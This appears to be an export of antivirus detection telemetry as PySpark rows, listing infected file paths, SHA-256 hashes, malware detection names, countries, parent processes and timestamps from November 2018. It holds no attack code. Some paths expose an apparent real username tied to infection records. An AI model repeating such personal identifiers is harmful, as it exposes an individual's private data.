  Row(detection=Row(filename='new_folder.exe', filepath='C:\\Users\\X\\Desktop\\New_Folder.exe', filesize=384000, name='W32/Sality.AA.#M1.#R1'), hash='43fc3e764d603d8dc5e7779fd56a74ac20a2af07b8c38b4b609eb3ab0d13520d', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T12:57:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='294784f61e109108e6ad36f271607a9f3fb782398b236fc5354451d5917cd9b2', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T12:45:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130630-01c5aeb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130630-01C5AEB9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:06:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe927_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe927 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T06:58:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140231-ef2563e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140231-EF2563E7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qtyy8webe0gxo.dll', filepath='\\?\\C:\\Windows\\QtYY8WEBe0gXO.dll', filesize=192000, name='Adware/ELEX.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:19:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:43:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T01:08:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6317343\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001790.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{380D42AC-7531-4738-9953-A56FA241C116}\\RP1\\A0001790.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='96d79869d25f153551a8d978ed342578369549cae4366f66050b8693f27d7359', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:20:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-95b5d339', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215927-95B5D339', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:59:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:17:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='oscm.exe', filepath='\\\\?\\C:\\Program Files\\Speed~Up~PC~2018 on HP-HP\\oscm.exe', filesize=3056000, name='SPR/Agent.8dc500.#M1.#R1'), hash='8dc500c74c0e5b8922bfcc96e8de6ba5b8508448e87396b591e620d2820a2034', metadata=Row(cmdline=None, country='MV', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:57:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132517-56e537cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132517-56E537CC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:25:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:44:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140235-effc0d6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140235-EFFC0D6F', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000093', filepath='C:\\Windows\\Temp\\tmp000004e2\\tmp00000093', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emsisoft Anti-Malware\\a2service.exe', parentsize=9449800, timestamp='2018-11-04T11:44:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:48:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T15:30:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190452-bf8ff0c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b809c41\\AVSCAN-20181104-190347-B79916EA\\AVSCAN-20181104-190452-BF8FF0C3', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='19a1b8c64f5c4aafbdbe32bd44a26bc32c9ad589100579799c772448564b959b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:04:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d480', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d480', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20180802-113444-39ba4203', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4391e462\\AVSCAN-20180802-113412-34595671\\AVSCAN-20180802-113444-39BA4203', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:40:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='exetools.sys', filepath='C:\\Users\\X\\Desktop\\12.2.50\\12.3.167.0\\Cracked\\Emulator\\Emul_64\\Exetools.sys', filesize=384000, name='TR/Black.Gen2.#M300.#R100338'), hash='1d9bba05408fdc74c1839a8890ab5092359bda910db9219287afe6a77cabe8e5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:djKZFSLfZUi+vTm2.1', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T14:54:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0003c9c9', filepath='C:\\Windows\\Temp\\2506595e-9777-4d59-b538-5440db77ee06\\tmp00003411\\tmp0003c9c9', filesize=1536000, name='TR/CoinMiner.CN.#M1.#R1'), hash='57353df34d61ae3e8855e6f3f725aaf2fcc9609fddffd2abedaddd3d0695c56b', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=542896, timestamp='2018-11-04T09:12:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='{239f33a3-75ef-69f7-51a9-c1846bcfe9f7}-service_kms.exe', filepath='\\\\?\\C:\\Windows\\System32\\MRT\\88E3BAB3-52CF-4B15-976E-0BE4CFA98AA8\\Samples\\{B3BAE388-CF52-154B-976E-0BE4CFA98AA8}\\{239F33A3-75EF-69F7-51A9-C1846BCFE9F7}-Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='d7bc6fd899d9890f6f3f7553c5b9237d8aedfb5a155764356b6d6a305f072ebb', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T10:23:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205147-fe49902b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205147-FE49902B', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008fd98', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008fd98', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='temp5.exe', filepath='\\\\?\\I:\\Ghost\\Fannan NewLook 6 Fin\\Software\\Fannan-Software\\Software\\docs\\Others\\Temp5.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='7ef40fc5015d04060d734f7ff1d3faaa3e3233e1aa51a50d38afb277c1b4484d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:44:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:32:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c9ab56a9ee3319dc8fa44e4556a087a5d357960d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c9ab56a9ee3319dc8fa44e4556a087a5d357960d', filesize=320000, name='Adware/DealPly.58c809.#M1.#R1'), hash='58c809d5d4d2e350c3695e7f58dba4a857d5749f4f2797623532b7246208e54a', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:25:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000016e', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000016e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T00:16:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries31.10.2018-29.available\\Avira\\41F4E1CA0527EF475D60BA8BB930C03A3B2118410FADDB35C3FBD949298AE520', filesize=812000, name='W32/Parite.#M1.#R1'), hash='41f4e1ca0527ef475d60ba8bb930c03a3b2118410faddb35c3fbd949298ae520', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-04T08:23:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T11:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d820', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d820', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-221620-66e41384', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221620-66E41384', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae8e4b96b5522890593bbb379a0a66f0e8e5005d2f7fb40e900a20a0fba7d81a', metadata=Row(cmdline='\\\\\\/Embedding', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T06:52:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:48:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101843-9422b926', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101843-9422B926', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\804\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='abf5101cde7d9a1c21fe01498a6e987af6a9078c46767e354e99ef3ce98ff7fd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230646-395b1944', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230646-395B1944', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160851-5ce946b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9182db30\\AVSCAN-20181102-160831-597C75AA\\AVSCAN-20181102-160851-5CE946B5', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153550-385d46de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2acb2827\\AVSCAN-20181102-153349-276DD231\\AVSCAN-20181102-153550-385D46DE', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T14:36:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125332-b3e54945', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-124637-83A78E9C\\AVSCAN-20181102-125332-B3E54945', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:51:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\data\\data.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f655a1813d3148a76e349c245a715eabf385a5d759bf16e910fb2c1b3620aae8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00026f85', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00026f85', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221616-6637cbdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221616-6637CBDB', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:14Z'), dt=datetime.date(2018, 11, 2)),
